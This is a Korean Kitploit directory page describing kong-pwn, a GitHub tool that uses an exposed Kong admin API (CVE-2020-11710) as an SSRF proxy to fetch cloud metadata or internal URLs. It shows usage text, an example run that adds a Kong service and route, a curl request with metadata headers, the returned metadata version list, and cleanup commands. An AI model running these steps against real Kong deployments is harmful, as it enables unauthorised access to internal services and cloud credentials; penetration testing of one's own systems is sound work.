Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/randomrobbiebf/kong-pwn
ReconnaissanceExploitationInformation GatheringWeb SecurityPenetration TestingCloud SecurityMisconfigurationRed TeamingAPI Security
GitHubrandomrobbiebf/kong-pwn

kong-pwn

노출된 KongAPI를 프록시로 사용하여 메타데이터 URL 또는 내부 URL을 가져옵니다.

626년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
kong-pwn — 노출된 KongAPI를 프록시로 사용하여 메타데이터 URL 또는 내부 URL을 가져옵니다. | Kitploit
저장소 보기

kong-pwn

노출된 KongAPI를 프록시처럼 사용하여 메타데이터 URL 또는 내부 URL을 획득합니다.

CVE-2020-11710 - 취약점이 아니라 잘못된 구성입니다.

사용 방법

root@kitploit:~
usage: kong-pwn.py [-h] -u URL -s SSRF [-p PROXY]
kong-pwn.py: error: the following arguments are required: -u/--url, -s/--ssrf

예시

root@kitploit:~
$ python3 kong-pwn.py -u http://127.0.0.1:8001
[+] Service Added [+]
[+] Route Added [+]

[+] Testing Kong for Metadata Proxy
curl http://127.0.0.1/foo/ -H "Host: metadata.local" -H "Metadata: true" -H "Metadata-Flavor: Google"

1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
latest

[+] To remove added routes and services do the following
curl -iX DELETE http://127.0.0.1:8001/routes/metadata-endpoint
curl -iX DELETE http://127.0.0.1:8001/services/metadata-endpoint
도구 다운로드